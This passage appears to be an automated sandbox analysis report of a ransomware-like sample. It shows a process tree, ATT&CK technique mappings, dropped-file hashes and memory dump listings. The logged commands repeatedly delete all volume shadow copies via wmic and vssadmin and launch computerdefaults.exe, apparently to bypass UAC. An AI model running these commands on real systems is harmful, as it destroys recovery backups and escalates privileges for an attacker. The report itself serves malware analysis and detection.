      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,13977432720409361536,11626390159896512161,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4884 /prefetch:1
      4⤵
      PID:5824
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,13977432720409361536,11626390159896512161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5884 /prefetch:1
      4⤵
      PID:6096
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,13977432720409361536,11626390159896512161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2680 /prefetch:1
      4⤵
      PID:5436
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,13977432720409361536,11626390159896512161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4148 /prefetch:1
      4⤵
      PID:528
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4228
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3724
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2116
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4872
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2436

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2972
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1932
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:4340

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2528

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3824
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1592
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:3064

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:1460

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4512

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1452

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4340

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2028

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4236

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5788
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5472
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:4964

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5300
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5468
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:2304

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3164

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4896

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4984

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5940
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4536
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5016

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5528
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:228
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5144

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3228

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5960

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5704

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5500
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5276
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:4896

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:3488
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:1456
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:4084

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:6064

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:6048

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
7a5862a0ca86c0a4e8e0b30261858e1f

SHA1
ee490d28e155806d255e0f17be72509be750bf97

SHA256
92b4c004a9ec97ccf7a19955926982bac099f3b438cd46063bb9bf5ac7814a4b

SHA512
0089df12ed908b4925ba838e07128987afe1c9235097b62855122a03ca6d34d7c75fe4c30e68581c946b77252e7edf1dd66481e20c0a9cccd37e0a4fe4f0a6fe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
ba09f5e48147d9d07203d77fa24ef905

SHA1
b0d2b3b301c72105e08a87a8fa8acba2fc28738b

SHA256
3efad7ee37d8711bceb95154a92212e6ac740e1ddd61ab89ae68ddc9bc472452

SHA512
fca371cf19c9ec175a9af3db0a404b3d2c09fe8c9b69e3b082f03f490654582af5cc5a77f09bfc6b5309200bbdd8eb402a83036d9b15228f8ea81940edfab88e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
e1a7ab9b360c151d7c86d6622c0d4679

SHA1
e3c7056cdbd746d788539b7ff0d4e45e1e62f947

SHA256
08919fce239a6c9ede83883a8ce996af2ad98f024dd573f9575ee0c8333bf0f4

SHA512
e65e5d15cb966c4856f4e17269b0c230a2ae79e4d44e12af518b4f11ac980b67ad8f130617a7d8a6adea46102fceb64cf0ecc360860386f9ecd3237b8d3b4e4b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
52826cef6409f67b78148b75e442b5ea

SHA1
a675db110aae767f5910511751cc3992cddcc393

SHA256
98fc43994599573e7181c849e5865f23b4f05f85c1115dff53c58764d80373fb

SHA512
f18df18cab6b5ecd71b79c81a2a1fdac42cc9960f62f06ac25f4d6487792705f2766ee3a10239eaac940d090186e6bc820e4eb7a5ee138f6e5c1c64f951b960c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
d4e3c5c2656c96cd2899e5fe49a8c093

SHA1
cb038023436699fbc617a9fc53313ff49537cbcb

SHA256
d71827e4a421a898417c4bdb7a6bbd5164ae9c0aeccc3f8a6f3e00942a9532ad

SHA512
97337fff65dd5fc2cde457dea3ed36d462fc15629add586b36fa888802e7bf440dd1450e12adf0d5c96035788e7b4cd9310f0522117d9825ccb14d70a2aa5c61

Download Submit
C:\Users\Admin\Pictures\readme.txt

Filesize
1KB

MD5
bcd29f316379728c6117c38d131be8f6

SHA1
a61e5b0527405ea73506be22119271fcbd8dbfbe

SHA256
46cfa5da5cb0e98fbb69403e1e9730f9e881d5ddd88a995e955f24dc53c080c9

SHA512
2bcb416a8824a0dac5dab7fa5ec1c52d7a6e0b6fe21e76b0db9426bc2edaad6a00969dc879fe55edb9dd3cae4727723370bf01f1f07a59f7afb68f7ed7d7b4c6

Download Submit
memory/2508-14-0x0000022A68CD0000-0x0000022A68CD4000-memory.dmp

Filesize
16KB

Download
memory/2508-7-0x0000022A68CD0000-0x0000022A68CD4000-memory.dmp

Filesize
16KB

Download
memory/4820-6-0x0000029872980000-0x0000029872981000-memory.dmp

Filesize
4KB

Download
memory/4820-12-0x00000298729F0000-0x00000298729F1000-memory.dmp

Filesize
4KB

Download
memory/4820-13-0x0000029872A00000-0x0000029872A01000-memory.dmp

Filesize
4KB

Download
memory/4820-10-0x00000298729D0000-0x00000298729D1000-memory.dmp

Filesize
4KB

Download
memory/4820-11-0x00000298729E0000-0x00000298729E1000-memory.dmp

Filesize
4KB

Download
memory/4820-9-0x00000298729A0000-0x00000298729A1000-memory.dmp

Filesize
4KB

Download
memory/4820-8-0x0000029872990000-0x0000029872991000-memory.dmp

Filesize
4KB

Download
memory/4820-0-0x00000298723D0000-0x000002987270A000-memory.dmp

Filesize
3.2MB

Download
memory/4820-5-0x0000029872970000-0x0000029872971000-memory.dmp

Filesize
4KB

Download
memory/4820-4-0x0000029872960000-0x0000029872961000-memory.dmp

Filesize
4KB

Download
memory/4820-3-0x0000029872950000-0x0000029872951000-memory.dmp

Filesize
4KB

Download
memory/4820-2-0x0000029872320000-0x0000029872321000-memory.dmp

Filesize
4KB

Download
memory/4820-1-0x0000029872310000-0x0000029872311000-memory.dmp

Filesize
4KB

Download